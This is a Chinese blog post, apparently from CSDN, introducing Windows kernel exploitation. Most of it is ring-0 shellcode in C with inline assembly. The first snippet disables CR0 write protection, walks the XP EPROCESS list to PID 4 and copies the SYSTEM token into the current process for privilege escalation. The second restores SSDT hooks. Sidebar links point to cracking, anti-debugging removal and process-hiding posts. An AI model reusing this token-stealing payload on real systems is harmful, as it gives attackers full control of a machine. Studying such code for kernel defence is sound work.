内核漏洞初步

最新推荐文章于 2020-09-07 11:43:46 发布
最新推荐文章于 2020-09-07 11:43:46 发布
阅读量567 收藏
点赞数
分类专栏: 内核驱动 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moshangyanyuyao/article/details/17472205
版权





1.提权到SYSTEM
修改当前进程的token为SYSTEM进程的  token,这样就具备了系统的最高权限,可以控制整个系统。
//Ring0中执行的Shellcode
NTSTATUS Ring0ShellCode(    
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax; 
and eax,0xFFFEFFFF; 
mov cr0, eax; 
}
//do something
_asm
{
mov eax,0xFFDFF124
mov eax,[eax]                    //获取当前线程PTHREAD
mov esi,[eax+0x220]          //获取当前进程PEPROCESS
mov eax,esi
L:
mov eax,[eax+0x88]        //获取进程链表
sub eax,0x88
mov edx,[eax+0x84]        //获取PID
cmp edx,0x4                    //比较进程ID是否为4即system 这几个偏移量与系统的版本有关,这里是XP
jne L
mov eax,[eax+0xc8]
mov [esi+0xc8],eax
}
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;
}  

2.恢复内核Hook、Inline Hook

NTSTATUS Ring0ShellCode(    
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax; 
and eax,0xFFFEFFFF; 
mov cr0, eax; 
}
//do something
ULONG i;
        for(i =0;i<g_ServiceNum;i++)
        {
                *(ULONG*)(*(ULONG*)g_RealSSDT+i*sizeof(ULONG)) = g_OrgService[i];
        }
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;

3.添加调用门、中断门,任务门,陷进门 
出入R0/R3的重要手段。

moshangyanyuyao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【反调试】去除各种反调试
Night May Say
04-14 1万+
前不久破解一个软件的时候遇到了各种反调试,折腾的自己各种难受,最终爆破了之后感觉心情大快就顺手写下了这篇文章使用工具十六进制分析工具:winhex 查壳工具:PEID 脱壳工具:ollydump插件或者LordPE 脱壳修复工具:ImportREC 逆向工具:OllyDbg分析过程PE修复打开源程序所在文件夹,发现有一个crackme,双机运行程序发现有这个提示: 应该是文件的PE结构
Windows 内核安全编程
04-27
内核编程涉及的操作通常需要更高的权限,因此错误可能导致系统崩溃或安全漏洞。在内核中进行安全编程至关重要,因为它直接影响到系统的稳定性和安全性。 首先,书中可能涵盖了如何正确地使用内核模式编程接口(如...
内核修改内存读写权限
水墨画
12-20 1501
修改成可读写__asm { push eax mov eax, CR0 and eax, 0xFFFEFFFF mov CR0, eax pop eax }恢复__asm { push eax mov eax, CR0 or eax, NOT 0xFFFEFFFF mov CR0, eax pop eax }
汇编语言:进位标志与溢出标志
热门推荐
brk1985的专栏
06-12 1万+
对于非符号数来说,不存在溢出的问题,它的进位就相当于符号数中的溢出. 而对于符号数来说,不存在进位的问题.两个正数相加(或一个正数减一个负数)得到负数,或是两个负数相加得到正数,就是溢出了.一个正数和一个负数相加不可能溢出
30天自制操作系统day20
吃烧饼的专栏
07-25 891
上一章讲到可以运行磁盘上的应用程序了,但只是非常简单的程序。操作系统应该为应用程序提供系统调用(system call、API),供应用程序调用。这一章讲到了显示字符的API。显示字符APIvoid cons_putchar() 在系统程序中,接受的参数是命令行窗口结构cons和字符。为了简化调用过程,外面包装了一个asm_cons_putchar 函数:_asm_cons_putchar:
寒江独钓:Windows内核安全编程(光碟源码 第一章)
07-30
通过学习这一章的内容,读者将能够建立起对Windows内核安全编程的初步认识,并具备进一步深入学习和实践的能力。源代码分析和实战练习将加深对理论知识的理解,帮助开发者在实际项目中应用这些原则和技巧。
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
漏洞主要存在于Windows操作系统中的Win32k.sys内核模式驱动程序,是Windows图形子系统的核心组件。 **Win32k.sys驱动程序** Win32k.sys是Windows内核模式驱动程序,它负责窗口管理、图形设备接口(GDI)以及与...
Verified-BPF:对 BPF 元语言的初步修改和在 Coq 中正式验证的实现
06-05
通过Coq的形式化验证,可以提高BPF的可靠性和安全性,减少潜在的漏洞。 7. **软件工程实践**:使用形式化验证在软件开发中的应用,展示了高质量和安全的代码编写实践,特别是在关键基础设施和系统中。 8. **开源...
基于VC平台下C++反汇编与逆向分析研究——No.1
三缺
05-27 4255
首先感谢小生我怕怕大神,这个是他的随笔,作为一个业余爱好者,确实挺喜欢这门技术,所以做了这个系列的转载,后面会慢慢更新! 不过时间有限,一边考研,为了给自己枯燥的生活带来点乐趣,故选择随便看些东西! ———————————————————————————————————————————————— 分析环境:WIN7sp1 所用工具:VC++6.0/OllyDBG/IDA 适用人群
作死的逆向分析
Request timed out.
08-03 633
打开源程序所在文件夹,发现有一个crackme 双机运行程序发现有这个提示: 应该是文件的PE结构被修改了,winhex载入分析发现: 果然是PE结构的问题,在DOS头后面的PE头的16进制应该为50 45,将上述52修改为45,保存文件之后发现仍然运行不了,证明PE结构仍然存在问题。 分析PE头后面的IMAGE_FILE_HEADER(映像文件头,NT头),对比结构: ty
简单inline hook ObReferenceObjectByHandle保护进程和屏蔽文件执行
06-04 1518
作 者: Sysnap时 间: 2008-05-30,19:16链 接: http://bbs.pediy.com/showthread.php?t=65731// ***************************************************************//  Author:  Sysnap     //  Link:    http://hi.baidu.c
64-ia-32架构优化手册(17)
wuhui_gdnt的专栏
08-30 423
3.5. 优化执行核 在最近一代微架构中,超标量、乱序执行核包含可以并行执行多个微操作的多个执行硬件资源。这些资源通常确保微操作能高效执行并以固定的时延前进。使用可用并行性的一般准则是: 遵循规则(参考3.4节)来最大化可用的解码带宽以及前端吞吐率。这些规则包括优先单微操作指令,利用微融合、栈指针追踪器与宏融合。 最大化重命名带宽。指引在本节中讨论,包括正确处理部分寄存器(partial r...
在2000和xp下,隐藏进程,vc6.0测试通过
yanzheng1的专栏
01-14 1266
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////Hide Process#include#include#include#defin
mov eax,0x4e1fb3b call eax
weixin_41454036的博客
09-07 595
MOV EAX,1 是将立即数1移入EAX中,执行该指令后 EAX = 1 MOV EAX,[1] 是将内存地址1内的一个DWORD(4字节)的数据移入EAX中,执行完该指令后 EAX = 内存地址1处的DWORD数据 MOV EAX,0x4e1fb3b 是将立即数1移入EAX中,执行该指令后 EAX = 1 MOV EAX,[0x4e1fb3b] 是将内存地址1内的一个DWORD(4字节)的数据移入EAX中,执行完该指令后 EAX = 内存地址1处的DWORD数据 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值